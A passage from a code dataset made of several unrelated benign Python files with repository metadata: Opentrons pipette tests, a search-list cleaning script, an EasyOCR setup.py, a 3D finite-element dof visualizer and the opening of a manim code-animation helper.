assert subject.get_pipette()["working_volume"] == 300
subject.pick_up_tip(
well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
)
assert subject.get_pipette()["working_volume"] == 100
@pytest.mark.parametrize(
argnames=["side_effector"],
argvalues=[
[lambda i: None],
[lambda i: i.set_flow_rate(aspirate=212, dispense=44, blow_out=22)],
[lambda i: i.set_pipette_speed(aspirate=212, dispense=44, blow_out=22)],
],
)
def test_pipette_dict(
side_effector: Callable[[AbstractInstrument], None],
instrument_context: AbstractInstrument,
simulating_instrument_context: AbstractInstrument,
) -> None:
"""It should be the same."""
side_effector(instrument_context)
side_effector(simulating_instrument_context)
assert (
instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
)
def _aspirate(i: AbstractInstrument) -> None:
"""pipette dict with tip fixture."""
i.prepare_for_aspirate()
i.aspirate(12, 10)
def _aspirate_dispense(i: AbstractInstrument) -> None:
    """Side effector: aspirate 12 uL at rate 10, then dispense 2 uL at rate 2.

    The previous docstring ("pipette dict with tip fixture.") was a
    copy-paste leftover and did not describe this helper.
    """
    i.prepare_for_aspirate()
    i.aspirate(12, 10)
    i.dispense(2, 2)
def _aspirate_blowout(i: AbstractInstrument) -> None:
    """Side effector: aspirate 11 uL at rate 13, then blow out.

    The previous docstring ("pipette dict with tip fixture.") was a
    copy-paste leftover and did not describe this helper.
    """
    i.prepare_for_aspirate()
    i.aspirate(11, 13)
    i.blow_out()
@pytest.mark.parametrize(
    argnames=["side_effector"],
    argvalues=[
        [lambda i: None],
        [_aspirate],
        [_aspirate_dispense],
        [_aspirate_blowout],
    ],
)
def test_pipette_dict_with_tip(
    side_effector: Callable[[AbstractInstrument], None],
    instrument_context: AbstractInstrument,
    simulating_instrument_context: AbstractInstrument,
    labware: AbstractLabware,
) -> None:
    """It should be the same."""
    contexts = (instrument_context, simulating_instrument_context)
    # Home both implementations first.
    for context in contexts:
        context.home()
    # Pick up a tip in both implementations.
    for context in contexts:
        context.pick_up_tip(
            well=labware.get_wells()[0], tip_length=2, presses=3, increment=4
        )
    # Apply the same side effect to both, then their state must match.
    for context in contexts:
        side_effector(context)
    assert (
        instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
    )
    # Drop the tip in both and the state should still match.
    for context in contexts:
        context.drop_tip(home_after=False)
    assert (
        instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
    )
| 32.311475 | 87 | 0.718079 | from typing import Callable
import pytest
from pytest_lazyfixture import lazy_fixture
from opentrons.hardware_control import NoTipAttachedError
from opentrons.hardware_control.types import TipAttachedError
from opentrons.protocols.context.labware import AbstractLabware
from opentrons.protocols.context.instrument import AbstractInstrument
@pytest.fixture(
    params=[
        lazy_fixture("instrument_context"),
        lazy_fixture("simulating_instrument_context"),
    ]
)
def subject(request) -> AbstractInstrument:
    """Instrument under test; each test runs against both implementations."""
    return request.param
def test_same_pipette(
    instrument_context: AbstractInstrument,
    simulating_instrument_context: AbstractInstrument,
) -> None:
    """Both implementations should report an identical pipette dict."""
    assert (
        instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
    )
def test_aspirate_no_tip(subject: AbstractInstrument) -> None:
    """Aspirating without a tip attached should raise."""
    with pytest.raises(NoTipAttachedError, match="Cannot perform ASPIRATE"):
        subject.aspirate(volume=1, rate=1)
def test_prepare_to_aspirate_no_tip(subject: AbstractInstrument) -> None:
    """Preparing to aspirate without a tip attached should raise."""
    with pytest.raises(NoTipAttachedError, match="Cannot perform PREPARE_ASPIRATE"):
        subject.prepare_for_aspirate()
def test_dispense_no_tip(subject: AbstractInstrument) -> None:
    """Dispensing without a tip attached should raise."""
    with pytest.raises(NoTipAttachedError, match="Cannot perform DISPENSE"):
        subject.dispense(volume=1, rate=1)
def test_drop_tip_no_tip(subject: AbstractInstrument) -> None:
    """Dropping a tip when none is attached should raise."""
    with pytest.raises(NoTipAttachedError, match="Cannot perform DROPTIP"):
        subject.drop_tip(home_after=False)
def test_blow_out_no_tip(subject: AbstractInstrument) -> None:
    """Blowing out without a tip attached should raise."""
    with pytest.raises(NoTipAttachedError, match="Cannot perform BLOWOUT"):
        subject.blow_out()
def test_pick_up_tip_no_tip(
    subject: AbstractInstrument, labware: AbstractLabware
) -> None:
    """It should raise an error if a tip is already attached."""
    subject.home()
    subject.pick_up_tip(
        well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
    )
    # A second pick-up while a tip is attached must be rejected.
    with pytest.raises(TipAttachedError):
        subject.pick_up_tip(
            well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
        )
def test_aspirate_too_much(
    subject: AbstractInstrument, labware: AbstractLabware
) -> None:
    """It should raise an error when aspirating more than the max volume."""
    subject.home()
    subject.pick_up_tip(
        well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
    )
    subject.prepare_for_aspirate()
    with pytest.raises(
        AssertionError, match="Cannot aspirate more than pipette max volume"
    ):
        subject.aspirate(subject.get_max_volume() + 1, rate=1)
def test_working_volume(subject: AbstractInstrument, labware: AbstractLabware) -> None:
    """It should report the correct working volume with and without a tip."""
    subject.home()
    assert subject.get_pipette()["working_volume"] == 300
    subject.pick_up_tip(
        well=labware.get_wells()[0], tip_length=1, presses=None, increment=None
    )
    # With a tip attached the usable volume is capped by the tip.
    assert subject.get_pipette()["working_volume"] == 100
@pytest.mark.parametrize(
    argnames=["side_effector"],
    argvalues=[
        [lambda i: None],
        [lambda i: i.set_flow_rate(aspirate=212, dispense=44, blow_out=22)],
        [lambda i: i.set_pipette_speed(aspirate=212, dispense=44, blow_out=22)],
    ],
)
def test_pipette_dict(
    side_effector: Callable[[AbstractInstrument], None],
    instrument_context: AbstractInstrument,
    simulating_instrument_context: AbstractInstrument,
) -> None:
    """Both implementations should report the same dict after each mutation."""
    side_effector(instrument_context)
    side_effector(simulating_instrument_context)
    assert (
        instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
    )
def _aspirate(i: AbstractInstrument) -> None:
    """Side effector: prepare for aspirate, then aspirate 12 uL at rate 10."""
    i.prepare_for_aspirate()
    i.aspirate(12, 10)
def _aspirate_dispense(i: AbstractInstrument) -> None:
    """Side effector: aspirate 12 uL at rate 10, then dispense 2 uL at rate 2."""
    i.prepare_for_aspirate()
    i.aspirate(12, 10)
    i.dispense(2, 2)
def _aspirate_blowout(i: AbstractInstrument) -> None:
    """Side effector: aspirate 11 uL at rate 13, then blow out."""
    i.prepare_for_aspirate()
    i.aspirate(11, 13)
    i.blow_out()
@pytest.mark.parametrize(
    argnames=["side_effector"],
    argvalues=[
        [lambda i: None],
        [_aspirate],
        [_aspirate_dispense],
        [_aspirate_blowout],
    ],
)
def test_pipette_dict_with_tip(
    side_effector: Callable[[AbstractInstrument], None],
    instrument_context: AbstractInstrument,
    simulating_instrument_context: AbstractInstrument,
    labware: AbstractLabware,
) -> None:
    """Both implementations should report the same dict while a tip is attached."""
    # Home both implementations first.
    instrument_context.home()
    simulating_instrument_context.home()
    # Pick up a tip in both implementations.
    instrument_context.pick_up_tip(
        well=labware.get_wells()[0], tip_length=2, presses=3, increment=4
    )
    simulating_instrument_context.pick_up_tip(
        well=labware.get_wells()[0], tip_length=2, presses=3, increment=4
    )
    # Apply the same side effect to both and compare their reported state.
    side_effector(instrument_context)
    side_effector(simulating_instrument_context)
    assert (
        instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
    )
    # Drop the tip and the reported state should still match.
    instrument_context.drop_tip(home_after=False)
    simulating_instrument_context.drop_tip(home_after=False)
    assert (
        instrument_context.get_pipette() == simulating_instrument_context.get_pipette()
    )
| true | true |
1c3ca4e2960d97005dc4bd4214d06bd624d57dd8 | 673 | py | Python | cleanSearch.py | newnativeabq/mendeley-search | a9d7514deb57c34d72e06b1f33b0e8e9bb9fb090 | [
"MIT"
] | null | null | null | cleanSearch.py | newnativeabq/mendeley-search | a9d7514deb57c34d72e06b1f33b0e8e9bb9fb090 | [
"MIT"
] | null | null | null | cleanSearch.py | newnativeabq/mendeley-search | a9d7514deb57c34d72e06b1f33b0e8e9bb9fb090 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 22 10:57:39 2019
todo pull this directly from google API
@author: vince
"""
slist = []
# Clean the text
with open('search_list.txt') as f:
    slist = f.readlines()
# Drop the first three space-separated tokens of each line — presumably a
# numbering/prefix column in search_list.txt; TODO confirm against the raw file.
for i, row in enumerate(slist):
    slist[i] = ' '.join(row.split(' ')[3:])
# If the second character is a space, strip the first two characters
# (looks like a leftover one-character prefix; verify with the source data).
for i, row in enumerate(slist):
    if row.find(' ') == 1:
        slist[i] = row[2:]
# NOTE(review): hard-coded overwrite of the 8th entry — fragile if the input
# file ever changes order or length.
slist[7] = "HIV/AIDS"
# Strip trailing whitespace/newlines.
for i, row in enumerate(slist):
    slist[i] = row.rstrip()
# Create a set of unique values
search_set = set(slist)
# Write set back to file for later use
with open('search_clean.txt', 'w+') as f:
    for item in search_set:
        f.write(item+',')
| 19.228571 | 43 | 0.59584 |
# Read the raw search terms, one per line.
slist = []
with open('search_list.txt') as f:
    slist = f.readlines()
# Drop the first three space-separated tokens of each line — presumably a
# numbering/prefix column in search_list.txt; TODO confirm against the raw file.
for i, row in enumerate(slist):
    slist[i] = ' '.join(row.split(' ')[3:])
# If the second character is a space, strip the first two characters
# (looks like a leftover one-character prefix; verify with the source data).
for i, row in enumerate(slist):
    if row.find(' ') == 1:
        slist[i] = row[2:]
# NOTE(review): hard-coded overwrite of the 8th entry — fragile if the input
# file ever changes order or length.
slist[7] = "HIV/AIDS"
# Strip trailing whitespace/newlines, then deduplicate.
for i, row in enumerate(slist):
    slist[i] = row.rstrip()
search_set = set(slist)
# Persist the cleaned, comma-separated terms for later use.
with open('search_clean.txt', 'w+') as f:
    for item in search_set:
        f.write(item+',')
| true | true |
1c3ca5321c7dda2b3c987b3d02c18c62d4f35d39 | 1,102 | py | Python | setup.py | Van1us/EasyOCR | a1a88441192beb9f9299d5d78abe54b1a7f7b662 | [
"Apache-2.0"
] | 1 | 2021-08-24T17:46:26.000Z | 2021-08-24T17:46:26.000Z | setup.py | Van1us/EasyOCR | a1a88441192beb9f9299d5d78abe54b1a7f7b662 | [
"Apache-2.0"
] | null | null | null | setup.py | Van1us/EasyOCR | a1a88441192beb9f9299d5d78abe54b1a7f7b662 | [
"Apache-2.0"
] | 1 | 2022-01-04T07:00:12.000Z | 2022-01-04T07:00:12.000Z | """
End-to-End Multi-Lingual Optical Character Recognition (OCR) Solution
"""
from setuptools import setup
# io.open is an alias of the builtin open on Python 3; kept for legacy
# Python 2 compatibility.
from io import open
# Runtime dependencies come straight from requirements.txt
# ("utf-8-sig" tolerates a BOM at the start of the file).
with open('requirements.txt', encoding="utf-8-sig") as f:
    requirements = f.readlines()
def readme():
    """Return the contents of README.md for use as the long description."""
    with open('README.md', encoding="utf-8-sig") as f:
        README = f.read()
    return README
setup(
    name='easyocr',
    packages=['easyocr'],
    include_package_data=True,
    version='1.2.5.1',
    install_requires=requirements,
    entry_points={"console_scripts": ["easyocr= easyocr.cli:main"]},
    license='Apache License 2.0',
    description='End-to-End Multi-Lingual Optical Character Recognition (OCR) Solution',
    long_description=readme(),
    long_description_content_type="text/markdown",
    author='Rakpong Kittinaradorn',
    author_email='r.kittinaradorn@gmail.com',
    url='https://github.com/jaidedai/easyocr',
    download_url='https://github.com/jaidedai/easyocr.git',
    keywords=['ocr optical character recognition deep learning neural network'],
    classifiers=[
        'Development Status :: 5 - Production/Stable'
    ],
)
| 30.611111 | 88 | 0.696915 |
from setuptools import setup
# io.open is an alias of the builtin open on Python 3; kept for legacy
# Python 2 compatibility.
from io import open
# Runtime dependencies come straight from requirements.txt
# ("utf-8-sig" tolerates a BOM at the start of the file).
with open('requirements.txt', encoding="utf-8-sig") as f:
    requirements = f.readlines()
def readme():
    """Return the contents of README.md for use as the long description."""
    with open('README.md', encoding="utf-8-sig") as f:
        README = f.read()
    return README
setup(
    name='easyocr',
    packages=['easyocr'],
    include_package_data=True,
    version='1.2.5.1',
    install_requires=requirements,
    entry_points={"console_scripts": ["easyocr= easyocr.cli:main"]},
    license='Apache License 2.0',
    description='End-to-End Multi-Lingual Optical Character Recognition (OCR) Solution',
    long_description=readme(),
    long_description_content_type="text/markdown",
    author='Rakpong Kittinaradorn',
    author_email='r.kittinaradorn@gmail.com',
    url='https://github.com/jaidedai/easyocr',
    download_url='https://github.com/jaidedai/easyocr.git',
    keywords=['ocr optical character recognition deep learning neural network'],
    classifiers=[
        'Development Status :: 5 - Production/Stable'
    ],
)
| true | true |
1c3ca5e731a0a1f524fc4c9e63a4b5cac3875b51 | 8,217 | py | Python | objects/CSCG/_3d/forms/standard/base/dofs/dof/visualize/matplot/_2sf.py | mathischeap/mifem | 3242e253fb01ca205a76568eaac7bbdb99e3f059 | [
"MIT"
] | 1 | 2020-10-14T12:48:35.000Z | 2020-10-14T12:48:35.000Z | objects/CSCG/_3d/forms/standard/base/dofs/dof/visualize/matplot/_2sf.py | mathischeap/mifem | 3242e253fb01ca205a76568eaac7bbdb99e3f059 | [
"MIT"
] | null | null | null | objects/CSCG/_3d/forms/standard/base/dofs/dof/visualize/matplot/_2sf.py | mathischeap/mifem | 3242e253fb01ca205a76568eaac7bbdb99e3f059 | [
"MIT"
] | null | null | null |
from root.config.main import *
import matplotlib.pyplot as plt
from screws.freeze.main import FrozenOnly
class _3dCSCG_SF_DOF_VISUALIZE_matplot_2SF(FrozenOnly):
    """Matplotlib visualizer for a single dof of a 3d CSCG standard 2-form."""
    def __init__(self, dof):
        """Bind the dof, its form and mesh, then freeze the instance."""
        self._dof_ = dof
        self._mesh_ = dof._sf_.mesh
        self._sf_ = dof._sf_
        self._freeze_self_()
    def __call__(self, *args, **kwargs):
        """Plot this dof; dispatch on whether the form is hybrid.

        (The previous docstring said "0-form" — this visualizer is for the
        2-form, see the class name and the non-hybrid plotting method.)
        """
        if self._sf_.IS.hybrid:
            return self.___PRIVATE_matplot_dof_k_form_IS_hybrid__(*args, **kwargs)
        else:
            return self.___PRIVATE_matplot_dof_2form_IS_NOT_hybrid__(*args, **kwargs)
    def ___PRIVATE_matplot_dof_k_form_IS_hybrid__(self, *args, **kwargs):
        """Plot a hybrid dof by delegating to the matching dof of an
        equivalent non-hybrid form (rebuilt with ``is_hybrid=False``).

        All MPI ranks take part in the gather/broadcast; a hybrid dof lives
        in exactly one (element, index) position.
        """
        f_kwargs = self._sf_.___define_parameters___['kwargs']
        f_kwargs['is_hybrid'] = False
        non_hybrid_form = self._sf_.__class__(self._sf_.mesh, self._sf_.space, **f_kwargs)
        dofs = non_hybrid_form.dofs
        hy_i = self._dof_._i_
        GPs = self._dof_.GLOBAL_positions
        assert len(GPs) == 1, f"trivial check!"
        pos = GPs[0]
        if pos in self._dof_.positions:
            Ele, index = pos
            nhy_i = non_hybrid_form.numbering.gathering[Ele][index]
        else:
            nhy_i = None
        nhy_i = cOmm.gather(nhy_i, root=mAster_rank)
        if rAnk == mAster_rank:
            # Exactly one rank should have resolved the non-hybrid numbering.
            I = 0
            for _ in nhy_i:
                if _ is not None:
                    I += 1
                    NHY_I = _
            assert I == 1, "only find one position."
            nhy_i = NHY_I
        else:
            pass
        nhy_i = cOmm.bcast(nhy_i, root=mAster_rank)
        DI = dofs[nhy_i]
        assert len(GPs) == 1, f"A hybrid dof must appear only at 1 place."
        GPs = GPs[0]
        position = 'in hybrid ME-' + str(GPs[0])
        if 'title' not in kwargs:
            kwargs['title'] = f"dof#{hy_i} of {self._sf_.k}-form: {self._sf_.standard_properties.name}, " + position
        DI.visualize.matplot(*args, **kwargs)
    def ___PRIVATE_matplot_dof_2form_IS_NOT_hybrid__(
        self, density=20, saveto=None, linewidth=0.6, title=None):
        """Plot this 2-form dof's face patch inside a wireframe of the mesh.

        Only the master rank assembles and shows/saves the figure; all ranks
        participate in the MPI gathers/broadcasts.

        :param density: grid resolution used for element frames and the patch.
        :param saveto: if given (non-empty), save the figure there instead of showing it.
        :param linewidth: line width of the element wireframe.
        :param title: figure title; a default is generated when None.
        """
        positions = self._dof_.positions
        EF = dict()
        for E_I in positions:
            E, I = E_I
            EF[E] = self._sf_.___PRIVATE_element_grid_data_generator_1___(E, density=density)
        GPs = self._dof_.GLOBAL_positions
        Element_Frames = cOmm.gather(EF, root=mAster_rank)
        if rAnk == mAster_rank:
            # ------------ prepare figure -----------------------------------------------------------------
            fig = plt.figure(figsize=(12, 8))
            ax = fig.add_subplot(111, projection='3d')
            # make the panes transparent
            ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
            ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
            ax.zaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
            # make the grid lines transparent
            ax.xaxis._axinfo["grid"]['color'] = (1, 1, 1, 0)
            ax.yaxis._axinfo["grid"]['color'] = (1, 1, 1, 0)
            ax.zaxis._axinfo["grid"]['color'] = (1, 1, 1, 0)
            ax.tick_params(labelsize=12)
            ax.set_xlabel(r'$x$', fontsize=15)
            ax.set_ylabel(r'$y$', fontsize=15)
            ax.set_zlabel(r'$z$', fontsize=15)
            # ------ plot element frame -----------------------------------------------------------------
            Element_Frame = dict()
            for ef in Element_Frames:
                Element_Frame.update(ef)
            for e in Element_Frame:
                EFe = Element_Frame[e]
                if 'xLines_x' in EFe:
                    X, Y, Z = EFe['xLines_x'], EFe['xLines_y'], EFe['xLines_z']
                    for x, y, z in zip(X, Y, Z):
                        plt.plot(x, y, z, 'gray', linewidth=linewidth)
                if 'yLines_x' in EFe:
                    X, Y, Z = EFe['yLines_x'], EFe['yLines_y'], EFe['yLines_z']
                    for x, y, z in zip(X, Y, Z):
                        plt.plot(x, y, z, 'gray', linewidth=linewidth)
                if 'zLines_x' in EFe:
                    X, Y, Z = EFe['zLines_x'], EFe['zLines_y'], EFe['zLines_z']
                    for x, y, z in zip(X, Y, Z):
                        plt.plot(x, y, z, 'gray', linewidth=linewidth)
                X, Y, Z = EFe['xLines_x_B'], EFe['xLines_y_B'], EFe['xLines_z_B']
                for x, y, z in zip(X, Y, Z):
                    plt.plot(x, y, z, 'green', linewidth=linewidth)
                X, Y, Z = EFe['yLines_x_B'], EFe['yLines_y_B'], EFe['yLines_z_B']
                for x, y, z in zip(X, Y, Z):
                    plt.plot(x, y, z, 'green', linewidth=linewidth)
                X, Y, Z = EFe['zLines_x_B'], EFe['zLines_y_B'], EFe['zLines_z_B']
                for x, y, z in zip(X, Y, Z):
                    plt.plot(x, y, z, 'green', linewidth=linewidth)
                x, y, z = EFe['center']['coordinate']
                x, y, z = x[0], y[0], z[0]
                num = EFe['center']['number']
                ax.text(x, y, z, num, color='red', ha='center', va='center', ma='center')
            # ------ plot the dof of 2-form ----------------------------------------------------------------
            pos = GPs[0]
            element, index = pos
            # Find which local-numbering component (0, 1 or 2) holds the index;
            # IND selects the face orientation of the dof.
            i, j, k = np.where(self._sf_.numbering.local[0] == index)
            if len(i) == 0:
                i, j, k = np.where(self._sf_.numbering.local[1] == index)
                if len(i) == 0:
                    i, j, k = np.where(self._sf_.numbering.local[2] == index)
                    assert len(i) != 0, f"Must have found the index."
                    IND = 2
                else:
                    IND = 1
            else:
                IND = 0
            i, j, k = i[0], j[0], k[0]
            nodes = self._sf_.space.nodes #
            if IND == 0:
                x, y, z = nodes[0][i] * np.ones((density, density)), \
                          np.linspace(nodes[1][j], nodes[1][j+1], density), \
                          np.linspace(nodes[2][k], nodes[2][k+1], density)
                y, z = np.meshgrid(y, z, indexing='ij')
            elif IND == 1:
                x, y, z = np.linspace(nodes[0][i], nodes[0][i+1], density), \
                          nodes[1][j] * np.ones((density, density)), \
                          np.linspace(nodes[2][k], nodes[2][k+1], density)
                x, z = np.meshgrid(x, z, indexing='ij')
            elif IND == 2:
                x, y, z = np.linspace(nodes[0][i], nodes[0][i+1], density), \
                          np.linspace(nodes[1][j], nodes[1][j+1], density), \
                          nodes[2][k] * np.ones((density, density))
                x, y = np.meshgrid(x, y, indexing='ij')
            else:
                raise Exception()
            xyz = x, y, z
        else:
            element = None
            xyz = None
        xyz, element = cOmm.bcast([xyz, element], root=mAster_rank)
        if element in self._mesh_.elements:
            xyz = self._mesh_.elements[element].coordinate_transformation.mapping(*xyz)
        else:
            xyz = None
        xyz = cOmm.gather(xyz, root=mAster_rank)
        if rAnk == mAster_rank:
            for ___ in xyz:
                if ___ is not None:
                    x, y, z = ___
                    break
            ax.plot_surface(x, y, z, color=(0,0,1,0.5))
            # --------- title ------------------------------------------------------------------------------
            if title is None:
                plt.title(f"dof#{self._dof_._i_} of {self._sf_.k}-form: {self._sf_.standard_properties.name}.")
            else:
                plt.title(title)
            # ---------- SAVE TO ---------------------------------------------------------------------------
            plt.tight_layout()
            if saveto is not None and saveto != '':
                plt.savefig(saveto, bbox_inches='tight')
                plt.close()
            else:
                plt.show()
            # ================================================================================
            return fig
from root.config.main import *
import matplotlib.pyplot as plt
from screws.freeze.main import FrozenOnly
class _3dCSCG_SF_DOF_VISUALIZE_matplot_2SF(FrozenOnly):
    """Matplotlib visualizer for a single dof of a 3d CSCG standard 2-form."""
    def __init__(self, dof):
        """Bind the dof, its form and mesh, then freeze the instance."""
        self._dof_ = dof
        self._mesh_ = dof._sf_.mesh
        self._sf_ = dof._sf_
        self._freeze_self_()
    def __call__(self, *args, **kwargs):
        """Plot this dof; dispatch on whether the form is hybrid."""
        if self._sf_.IS.hybrid:
            return self.___PRIVATE_matplot_dof_k_form_IS_hybrid__(*args, **kwargs)
        else:
            return self.___PRIVATE_matplot_dof_2form_IS_NOT_hybrid__(*args, **kwargs)
    def ___PRIVATE_matplot_dof_k_form_IS_hybrid__(self, *args, **kwargs):
        """Plot a hybrid dof by delegating to the matching dof of an
        equivalent non-hybrid form (rebuilt with ``is_hybrid=False``).
        """
        f_kwargs = self._sf_.___define_parameters___['kwargs']
        f_kwargs['is_hybrid'] = False
        non_hybrid_form = self._sf_.__class__(self._sf_.mesh, self._sf_.space, **f_kwargs)
        dofs = non_hybrid_form.dofs
        hy_i = self._dof_._i_
        GPs = self._dof_.GLOBAL_positions
        assert len(GPs) == 1, f"trivial check!"
        pos = GPs[0]
        if pos in self._dof_.positions:
            Ele, index = pos
            nhy_i = non_hybrid_form.numbering.gathering[Ele][index]
        else:
            nhy_i = None
        nhy_i = cOmm.gather(nhy_i, root=mAster_rank)
        if rAnk == mAster_rank:
            # Exactly one rank should have resolved the non-hybrid numbering.
            I = 0
            for _ in nhy_i:
                if _ is not None:
                    I += 1
                    NHY_I = _
            assert I == 1, "only find one position."
            nhy_i = NHY_I
        else:
            pass
        nhy_i = cOmm.bcast(nhy_i, root=mAster_rank)
        DI = dofs[nhy_i]
        assert len(GPs) == 1, f"A hybrid dof must appear only at 1 place."
        GPs = GPs[0]
        position = 'in hybrid ME-' + str(GPs[0])
        if 'title' not in kwargs:
            kwargs['title'] = f"dof#{hy_i} of {self._sf_.k}-form: {self._sf_.standard_properties.name}, " + position
        DI.visualize.matplot(*args, **kwargs)
    def ___PRIVATE_matplot_dof_2form_IS_NOT_hybrid__(
        self, density=20, saveto=None, linewidth=0.6, title=None):
        """Plot this 2-form dof's face patch inside a wireframe of the mesh.

        Only the master rank assembles and shows/saves the figure; all ranks
        participate in the MPI gathers/broadcasts.
        """
        positions = self._dof_.positions
        EF = dict()
        for E_I in positions:
            E, I = E_I
            EF[E] = self._sf_.___PRIVATE_element_grid_data_generator_1___(E, density=density)
        GPs = self._dof_.GLOBAL_positions
        Element_Frames = cOmm.gather(EF, root=mAster_rank)
        if rAnk == mAster_rank:
            # Prepare the figure with transparent panes and grid lines.
            fig = plt.figure(figsize=(12, 8))
            ax = fig.add_subplot(111, projection='3d')
            ax.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
            ax.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
            ax.zaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
            ax.xaxis._axinfo["grid"]['color'] = (1, 1, 1, 0)
            ax.yaxis._axinfo["grid"]['color'] = (1, 1, 1, 0)
            ax.zaxis._axinfo["grid"]['color'] = (1, 1, 1, 0)
            ax.tick_params(labelsize=12)
            ax.set_xlabel(r'$x$', fontsize=15)
            ax.set_ylabel(r'$y$', fontsize=15)
            ax.set_zlabel(r'$z$', fontsize=15)
            # Plot the element wireframe gathered from all ranks.
            Element_Frame = dict()
            for ef in Element_Frames:
                Element_Frame.update(ef)
            for e in Element_Frame:
                EFe = Element_Frame[e]
                if 'xLines_x' in EFe:
                    X, Y, Z = EFe['xLines_x'], EFe['xLines_y'], EFe['xLines_z']
                    for x, y, z in zip(X, Y, Z):
                        plt.plot(x, y, z, 'gray', linewidth=linewidth)
                if 'yLines_x' in EFe:
                    X, Y, Z = EFe['yLines_x'], EFe['yLines_y'], EFe['yLines_z']
                    for x, y, z in zip(X, Y, Z):
                        plt.plot(x, y, z, 'gray', linewidth=linewidth)
                if 'zLines_x' in EFe:
                    X, Y, Z = EFe['zLines_x'], EFe['zLines_y'], EFe['zLines_z']
                    for x, y, z in zip(X, Y, Z):
                        plt.plot(x, y, z, 'gray', linewidth=linewidth)
                X, Y, Z = EFe['xLines_x_B'], EFe['xLines_y_B'], EFe['xLines_z_B']
                for x, y, z in zip(X, Y, Z):
                    plt.plot(x, y, z, 'green', linewidth=linewidth)
                X, Y, Z = EFe['yLines_x_B'], EFe['yLines_y_B'], EFe['yLines_z_B']
                for x, y, z in zip(X, Y, Z):
                    plt.plot(x, y, z, 'green', linewidth=linewidth)
                X, Y, Z = EFe['zLines_x_B'], EFe['zLines_y_B'], EFe['zLines_z_B']
                for x, y, z in zip(X, Y, Z):
                    plt.plot(x, y, z, 'green', linewidth=linewidth)
                x, y, z = EFe['center']['coordinate']
                x, y, z = x[0], y[0], z[0]
                num = EFe['center']['number']
                ax.text(x, y, z, num, color='red', ha='center', va='center', ma='center')
            # Locate the dof's face in the local numbering; IND selects its
            # orientation (0, 1 or 2).
            pos = GPs[0]
            element, index = pos
            i, j, k = np.where(self._sf_.numbering.local[0] == index)
            if len(i) == 0:
                i, j, k = np.where(self._sf_.numbering.local[1] == index)
                if len(i) == 0:
                    i, j, k = np.where(self._sf_.numbering.local[2] == index)
                    assert len(i) != 0, f"Must have found the index."
                    IND = 2
                else:
                    IND = 1
            else:
                IND = 0
            i, j, k = i[0], j[0], k[0]
            nodes = self._sf_.space.nodes
            if IND == 0:
                x, y, z = nodes[0][i] * np.ones((density, density)), \
                          np.linspace(nodes[1][j], nodes[1][j+1], density), \
                          np.linspace(nodes[2][k], nodes[2][k+1], density)
                y, z = np.meshgrid(y, z, indexing='ij')
            elif IND == 1:
                x, y, z = np.linspace(nodes[0][i], nodes[0][i+1], density), \
                          nodes[1][j] * np.ones((density, density)), \
                          np.linspace(nodes[2][k], nodes[2][k+1], density)
                x, z = np.meshgrid(x, z, indexing='ij')
            elif IND == 2:
                x, y, z = np.linspace(nodes[0][i], nodes[0][i+1], density), \
                          np.linspace(nodes[1][j], nodes[1][j+1], density), \
                          nodes[2][k] * np.ones((density, density))
                x, y = np.meshgrid(x, y, indexing='ij')
            else:
                raise Exception()
            xyz = x, y, z
        else:
            element = None
            xyz = None
        xyz, element = cOmm.bcast([xyz, element], root=mAster_rank)
        if element in self._mesh_.elements:
            xyz = self._mesh_.elements[element].coordinate_transformation.mapping(*xyz)
        else:
            xyz = None
        xyz = cOmm.gather(xyz, root=mAster_rank)
        if rAnk == mAster_rank:
            for ___ in xyz:
                if ___ is not None:
                    x, y, z = ___
                    break
            ax.plot_surface(x, y, z, color=(0,0,1,0.5))
            if title is None:
                plt.title(f"dof#{self._dof_._i_} of {self._sf_.k}-form: {self._sf_.standard_properties.name}.")
            else:
                plt.title(title)
            plt.tight_layout()
            if saveto is not None and saveto != '':
                plt.savefig(saveto, bbox_inches='tight')
                plt.close()
            else:
                plt.show()
            return fig
1c3ca62019c75650299eb6536f4bfeab59e4ff4d | 5,160 | py | Python | code_replacement.py | laundmo/manim-code | 2758a092f95b0b3ebfabf049668310ecfef8238c | [
"MIT"
] | null | null | null | code_replacement.py | laundmo/manim-code | 2758a092f95b0b3ebfabf049668310ecfef8238c | [
"MIT"
] | null | null | null | code_replacement.py | laundmo/manim-code | 2758a092f95b0b3ebfabf049668310ecfef8238c | [
"MIT"
] | null | null | null | import re
from textwrap import dedent
from string_editor import LineColEditor
from manim import (
DOWN,
LEFT,
RIGHT,
UP,
Code,
Create,
CurvedArrow,
CyclicReplace,
FadeOut,
Scene,
SurroundingRectangle,
Uncreate,
)
def regex_line_span(regex, string, group=1):
    """Search *string* for *regex* and locate the given capture group.

    Returns ``(match, line_number, (col_start, col_stop))`` where the column
    offsets are 0-based positions of the group within its own line.
    """
    match = re.search(regex, string)
    group_start = match.start(group)
    group_end = match.end(group)
    # The number of newlines before the group gives its 0-based line number.
    line_number = string.count("\n", 0, group_start)
    # Offset of the first character of that line within the whole string.
    line_offset = string.rfind("\n", 0, group_start) + 1
    col_start = group_start - line_offset
    col_stop = col_start + (group_end - group_start)
    return match, line_number, (col_start, col_stop)
class sliceabledict(dict):
    """A dict that resolves slice keys: ``d[a:b]`` becomes ``slice(d[a], d[b])``."""

    def __getitem__(self, key):
        if isinstance(key, slice):
            # Map both endpoints through the dict, preserving slice-ness.
            return slice(self[key.start], self[key.stop])
        return super().__getitem__(key)
def make_manim_map(string):
    """Build a column -> token-index map for *string*.

    Runs of spaces form a single token and every non-space character forms
    one token each; each original column maps to the index of its token
    (presumably matching how manim lays out Code glyphs — verify).
    """
    tokens = re.findall("( +|[^ ])", string)
    column_to_token = {}
    offset = 0
    for token_index, token in enumerate(tokens):
        for within in range(len(token)):
            column_to_token[offset + within] = token_index
